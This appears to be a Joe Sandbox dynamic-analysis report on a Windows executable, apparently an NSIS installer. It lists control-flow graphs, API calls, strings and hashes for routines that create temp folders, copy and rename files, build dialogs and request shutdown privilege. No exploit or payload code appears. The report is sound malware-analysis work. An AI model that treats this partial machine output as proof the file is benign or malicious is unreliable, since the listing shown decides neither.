4091 4062a3 11 API calls 4090->4091 4091->4089 4093 402230 4092->4093 5143 402238 5144 40145c 18 API calls 5143->5144 5145 40223e 5144->5145 5146 4062a3 11 API calls 5145->5146 5147 40224b 5146->5147 5148 404f72 25 API calls 5147->5148 5149 402255 5148->5149 5150 405c3f 2 API calls 5149->5150 5151 40225b 5150->5151 5152 4062a3 11 API calls 5151->5152 5155 4022ac CloseHandle 5151->5155 5158 40226d 5152->5158 5154 4030e3 5155->5154 5156 402283 WaitForSingleObject 5157 402291 GetExitCodeProcess 5156->5157 5156->5158 5157->5155 5160 4022a3 5157->5160 5158->5155 5158->5156 5159 406332 2 API calls 5158->5159 5159->5156 5162 405f51 wsprintfW 5160->5162 5162->5155 5163 4040b8 5164 4040d3 5163->5164 5172 404201 5163->5172 5168 40410e 5164->5168 5194 403fca WideCharToMultiByte 5164->5194 5165 40426c 5166 404276 GetDlgItem 5165->5166 5167 40433e 5165->5167 5169 404290 5166->5169 5170 4042ff 5166->5170 5173 403dca 8 API calls 5167->5173 5175 403d3f 19 API calls 5168->5175 5169->5170 5178 4042b6 6 API calls 5169->5178 5170->5167 5179 404311 5170->5179 5172->5165 5172->5167 5174 40423b GetDlgItem SendMessageW 5172->5174 5177 404339 5173->5177 5199 403d85 EnableWindow 5174->5199 5176 40414e 5175->5176 5181 403d3f 19 API calls 5176->5181 5178->5170 5182 404327 5179->5182 5183 404317 SendMessageW 5179->5183 5186 40415b CheckDlgButton 5181->5186 5182->5177 5187 40432d SendMessageW 5182->5187 5183->5182 5184 404267 5185 403d61 SendMessageW 5184->5185 5185->5165 5197 403d85 EnableWindow 5186->5197 5187->5177 5189 404179 GetDlgItem 5198 403d98 SendMessageW 5189->5198 5191 40418f SendMessageW 5192 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5191->5192 5193 4041ac GetSysColor 5191->5193 5192->5177 5193->5192 5195 404007 5194->5195 5196 403fe9 GlobalAlloc WideCharToMultiByte 5194->5196 5195->5168 5196->5195 5197->5189 5198->5191 5199->5184 4094 401eb9 4095 401f24 4094->4095 4096 401ec6 4094->4096 4097 401f53 GlobalAlloc 4095->4097 4098 401f28 4095->4098 4099 401ed5 4096->4099 4106 401ef7 4096->4106 4100 406805 18 API calls 4097->4100 4105 4062a3 11 API calls 4098->4105 4110 401f36 4098->4110 4101 4062a3 11 API calls 4099->4101 4104 401f46 4100->4104 4102 401ee2 4101->4102 4107 402708 4102->4107 4112 406805 18 API calls 4102->4112 4104->4107 4108 402387 GlobalFree 4104->4108 4105->4110 4116 406009 lstrcpynW 4106->4116 4108->4107 4118 406009 lstrcpynW 4110->4118 4111 401f06 4117 406009 lstrcpynW 4111->4117 4112->4102 4114 401f15 4119 406009 lstrcpynW 4114->4119 4116->4111 4117->4114 4118->4104 4119->4107 5200 4074bb 5202 407344 5200->5202 5201 407c6d 5202->5201 5203 4073c2 GlobalFree 5202->5203 5204 4073cb GlobalAlloc 5202->5204 5205 407443 GlobalAlloc 5202->5205 5206 40743a GlobalFree 5202->5206 5203->5204 5204->5201 5204->5202 5205->5201 5205->5202 5206->5205

                                                                                                    Executed Functions

                                                                                                    Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304filestringcomCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 146 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 153 403923-403937 call 405d06 CharNextW 146->153 154 40391b-40391e 146->154 157 4039ca-4039d0 153->157 154->153 158 4039d6 157->158 159 40393c-403942 157->159 160 4039f5-403a0d GetTempPathW call 4037cc 158->160 161 403944-40394a 159->161 162 40394c-403950 159->162 169 403a33-403a4d DeleteFileW call 403587 160->169 170 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 160->170 161->161 161->162 164 403952-403957 162->164 165 403958-40395c 162->165 164->165 167 4039b8-4039c5 call 405d06 165->167 168 40395e-403965 165->168 167->157 183 4039c7 167->183 172 403967-40396e 168->172 173 40397a-40398c call 403800 168->173 186 403acc-403adb call 403859 OleUninitialize 169->186 187 403a4f-403a55 169->187 170->169 170->186 174 403970-403973 172->174 175 403975 172->175 184 4039a1-4039b6 call 403800 173->184 185 40398e-403995 173->185 174->173 174->175 175->173 183->157 184->167 202 4039d8-4039f0 call 407d6e call 406009 184->202 189 403997-40399a 185->189 190 40399c 185->190 200 403ae1-403af1 call 405ca0 ExitProcess 186->200 201 403bce-403bd4 186->201 192 403ab5-403abc call 40592c 187->192 193 403a57-403a60 call 405d06 187->193 189->184 189->190 190->184 199 403ac1-403ac7 call 4060e7 192->199 203 403a79-403a7b 193->203 199->186 206 403c51-403c59 201->206 207 403bd6-403bf3 call 4062fc * 3 201->207 202->160 211 403a62-403a74 call 403800 203->211 212 403a7d-403a87 203->212 213 403c5b 206->213 214 403c5f 206->214 238 403bf5-403bf7 207->238 239 403c3d-403c48 ExitWindowsEx 207->239 211->212 225 403a76 211->225 219 403af7-403b11 lstrcatW lstrcmpiW 212->219 220 403a89-403a99 call 40677e 212->220 213->214 219->186 224 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 219->224 220->186 231 403a9b-403ab1 call 406009 * 2 220->231 228 403b36-403b56 call 406009 * 2 224->228 229 403b2b-403b31 call 406009 224->229 225->203 245 403b5b-403b77 call 406805 DeleteFileW 228->245 229->228 231->192 238->239 243 403bf9-403bfb 238->243 239->206 242 403c4a-403c4c call 40141d 239->242 242->206 243->239 247 403bfd-403c0f GetCurrentProcess 243->247 253 403bb8-403bc0 245->253 254 403b79-403b89 CopyFileW 245->254 247->239 252 403c11-403c33 247->252 252->239 253->245 255 403bc2-403bc9 call 406c68 253->255 254->253 256 403b8b-403bab call 406c68 call 406805 call 405c3f 254->256 255->186 256->253 266 403bad-403bb4 CloseHandle 256->266 266->253
                                                                                                    APIs
                                                                                                    • #17.COMCTL32 ref: 004038A2
                                                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                                                    • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                                                      • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                      • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                      • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                    • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                    • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                                                    • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                                                    • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                                                    • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                                                    • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                                                    • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                                                    • OleUninitialize.OLE32(?), ref: 00403AD1
                                                                                                    • ExitProcess.KERNEL32 ref: 00403AF1
                                                                                                    • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                                                    • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                                                    • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                                                    • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                                                    • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                                                    • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                                                    • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                                                    • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                    • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                                                    • API String ID: 2435955865-239407132
                                                                                                    • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                                                    • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                                                    • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                                                    • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E
                                                                                                    Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 646 4074bb-4074c0 647 4074c2-4074ef 646->647 648 40752f-407547 646->648 650 4074f1-4074f4 647->650 651 4074f6-4074fa 647->651 649 407aeb-407aff 648->649 655 407b01-407b17 649->655 656 407b19-407b2c 649->656 652 407506-407509 650->652 653 407502 651->653 654 4074fc-407500 651->654 657 407527-40752a 652->657 658 40750b-407514 652->658 653->652 654->652 659 407b33-407b3a 655->659 656->659 662 4076f6-407713 657->662 663 407516 658->663 664 407519-407525 658->664 660 407b61-407c68 659->660 661 407b3c-407b40 659->661 677 407350 660->677 678 407cec 660->678 666 407b46-407b5e 661->666 667 407ccd-407cd4 661->667 669 407715-407729 662->669 670 40772b-40773e 662->670 663->664 665 407589-4075b6 664->665 673 4075d2-4075ec 665->673 674 4075b8-4075d0 665->674 666->660 671 407cdd-407cea 667->671 675 407741-40774b 669->675 670->675 676 407cef-407cf6 671->676 679 4075f0-4075fa 673->679 674->679 680 40774d 675->680 681 4076ee-4076f4 675->681 682 407357-40735b 677->682 683 40749b-4074b6 677->683 684 40746d-407471 677->684 685 4073ff-407403 677->685 678->676 688 407600 679->688 689 407571-407577 679->689 690 407845-4078a1 680->690 691 4076c9-4076cd 680->691 681->662 687 407692-40769c 681->687 682->671 692 407361-40736e 682->692 683->649 697 407c76-407c7d 684->697 698 407477-40748b 684->698 703 407409-407420 685->703 704 407c6d-407c74 685->704 693 4076a2-4076c4 687->693 694 407c9a-407ca1 687->694 706 407556-40756e 688->706 707 407c7f-407c86 688->707 695 40762a-407630 689->695 696 40757d-407583 689->696 690->649 699 407c91-407c98 691->699 700 4076d3-4076eb 691->700 692->678 708 407374-4073ba 692->708 693->690 694->671 709 40768e 695->709 710 407632-40764f 695->710 696->665 696->709 697->671 705 40748e-407496 698->705 699->671 700->681 711 407423-407427 703->711 704->671 705->684 715 407498 705->715 706->689 707->671 713 4073e2-4073e4 708->713 714 4073bc-4073c0 708->714 709->687 716 407651-407665 710->716 717 407667-40767a 710->717 711->685 712 407429-40742f 711->712 719 407431-407438 712->719 720 407459-40746b 712->720 723 4073f5-4073fd 713->723 724 4073e6-4073f3 713->724 721 4073c2-4073c5 GlobalFree 714->721 722 4073cb-4073d9 GlobalAlloc 714->722 715->683 718 40767d-407687 716->718 717->718 718->695 725 407689 718->725 726 407443-407453 GlobalAlloc 719->726 727 40743a-40743d GlobalFree 719->727 720->705 721->722 722->678 728 4073df 722->728 723->711 724->723 724->724 730 407c88-407c8f 725->730 731 40760f-407627 725->731 726->678 726->720 727->726 728->713 730->671 731->695
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                    • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                                                    • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                    • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                                                    Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                    • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 310444273-0
                                                                                                    • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                    • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                                                    • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                    • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                                                    Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                    • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                    • String ID:
                                                                                                    • API String ID: 2295610775-0
                                                                                                    • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                    • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                                                    • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                    • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8
                                                                                                    Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 4015a0-4015f4 1 4030e3-4030ec 0->1 2 4015fa 0->2 26 4030ee-4030f2 1->26 4 401601-401611 call 4062a3 2->4 5 401742-40174f 2->5 6 401962-40197d call 40145c GetFullPathNameW 2->6 7 4019ca-4019e6 call 40145c SearchPathW 2->7 8 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 2->8 9 401650-401668 call 40137e call 4062a3 call 40139d 2->9 10 4017b1-4017d8 call 40145c call 4062a3 call 405d59 2->10 11 401672-401686 call 40145c call 4062a3 2->11 12 401693-4016ac call 401446 call 4062a3 2->12 13 401715-401731 2->13 14 401616-40162d call 40145c call 4062a3 call 404f72 2->14 15 4016d6-4016db 2->15 16 401736-4030de 2->16 17 401897-4018a7 call 40145c call 4062d5 2->17 18 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 2->18 19 40163c-401645 2->19 20 4016bd-4016d1 call 4062a3 SetForegroundWindow 2->20 4->26 30 401751-401755 ShowWindow 5->30 31 401758-40175f 5->31 65 4019a3-4019a8 6->65 66 40197f-401984 6->66 7->1 58 4019ec-4019f8 7->58 8->1 83 40179a-4017a6 call 4062a3 8->83 92 40166d 9->92 105 401864-40186c 10->105 106 4017de-4017fc call 405d06 CreateDirectoryW 10->106 84 401689-40168e call 404f72 11->84 89 4016b1-4016b8 Sleep 12->89 90 4016ae-4016b0 12->90 13->26 27 401632-401637 14->27 24 401702-401710 15->24 25 4016dd-4016fd call 401446 15->25 16->1 60 4030de call 405f51 16->60 85 4018c2-4018d6 call 4062a3 17->85 86 4018a9-4018bd call 4062a3 17->86 113 401912-401919 18->113 114 40191e-401921 18->114 19->27 28 401647-40164e PostQuitMessage 19->28 20->1 24->1 25->1 27->26 28->27 30->31 31->1 49 401765-401769 ShowWindow 31->49 49->1 58->1 60->1 69 4019af-4019b2 65->69 66->69 76 401986-401989 66->76 69->1 79 4019b8-4019c5 GetShortPathNameW 69->79 76->69 87 40198b-401993 call 4062d5 76->87 79->1 100 4017ab-4017ac 83->100 84->1 85->26 86->26 87->65 110 401995-4019a1 call 406009 87->110 89->1 90->89 92->26 100->1 108 401890-401892 105->108 109 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 105->109 118 401846-40184e call 4062a3 106->118 119 4017fe-401809 GetLastError 106->119 108->84 109->1 110->69 113->84 120 401923-40192b call 4062d5 114->120 121 40194a-401950 114->121 133 401853-401854 118->133 124 401827-401832 GetFileAttributesW 119->124 125 40180b-401825 GetLastError call 4062a3 119->125 120->121 139 40192d-401948 call 406c68 call 404f72 120->139 129 401957-40195d call 4062a3 121->129 131 401834-401844 call 4062a3 124->131 132 401855-40185e 124->132 125->132 129->100 131->133 132->105 132->106 133->132 139->129
                                                                                                    APIs
                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                    • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                    • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                    • ShowWindow.USER32(?), ref: 00401753
                                                                                                    • ShowWindow.USER32(?), ref: 00401767
                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                    • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                    • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                    • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                    • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                    Strings
                                                                                                    • detailprint: %s, xrefs: 00401679
                                                                                                    • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                    • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                    • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                    • Sleep(%d), xrefs: 0040169D
                                                                                                    • Rename: %s, xrefs: 004018F8
                                                                                                    • SetFileAttributes failed., xrefs: 004017A1
                                                                                                    • Jump: %d, xrefs: 00401602
                                                                                                    • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                    • Call: %d, xrefs: 0040165A
                                                                                                    • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                    • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                    • Aborting: "%s", xrefs: 0040161D
                                                                                                    • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                    • Rename failed: %s, xrefs: 0040194B
                                                                                                    • Rename on reboot: %s, xrefs: 00401943
                                                                                                    • BringToFront, xrefs: 004016BD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                    • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                    • API String ID: 2872004960-3619442763
                                                                                                    • Opcode ID: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
                                                                                                    • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                                                    • Opcode Fuzzy Hash: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
                                                                                                    • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE
                                                                                                    Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 267 40592c-405944 call 4062fc 270 405946-405956 call 405f51 267->270 271 405958-405990 call 405ed3 267->271 279 4059b3-4059dc call 403e95 call 40677e 270->279 276 405992-4059a3 call 405ed3 271->276 277 4059a8-4059ae lstrcatW 271->277 276->277 277->279 285 405a70-405a78 call 40677e 279->285 286 4059e2-4059e7 279->286 292 405a86-405a8d 285->292 293 405a7a-405a81 call 406805 285->293 286->285 287 4059ed-405a15 call 405ed3 286->287 287->285 294 405a17-405a1b 287->294 296 405aa6-405acb LoadImageW 292->296 297 405a8f-405a95 292->297 293->292 301 405a1d-405a2c call 405d06 294->301 302 405a2f-405a3b lstrlenW 294->302 299 405ad1-405b13 RegisterClassW 296->299 300 405b66-405b6e call 40141d 296->300 297->296 298 405a97-405a9c call 403e74 297->298 298->296 306 405c35 299->306 307 405b19-405b61 SystemParametersInfoW CreateWindowExW 299->307 319 405b70-405b73 300->319 320 405b78-405b83 call 403e95 300->320 301->302 303 405a63-405a6b call 406722 call 406009 302->303 304 405a3d-405a4b lstrcmpiW 302->304 303->285 304->303 311 405a4d-405a57 GetFileAttributesW 304->311 310 405c37-405c3e 306->310 307->300 316 405a59-405a5b 311->316 317 405a5d-405a5e call 406751 311->317 316->303 316->317 317->303 319->310 325 405b89-405ba6 ShowWindow LoadLibraryW 320->325 326 405c0c-405c14 call 405047 320->326 328 405ba8-405bad LoadLibraryW 325->328 329 405baf-405bc1 GetClassInfoW 325->329 334 405c16-405c1c 326->334 335 405c2e-405c30 call 40141d 326->335 328->329 330 405bc3-405bd3 GetClassInfoW RegisterClassW 329->330 331 405bd9-405c0a DialogBoxParamW call 40141d call 403c68 329->331 330->331 331->310 334->319 337 405c22-405c29 call 40141d 334->337 335->306 337->319
                                                                                                    APIs
                                                                                                      • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                      • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                      • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                    • lstrcatW.KERNEL32(004D30C0,00447240), ref: 004059AE
                                                                                                    • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                                                    • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                                                    • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                                                    • RegisterClassW.USER32(0046AD60), ref: 00405B0A
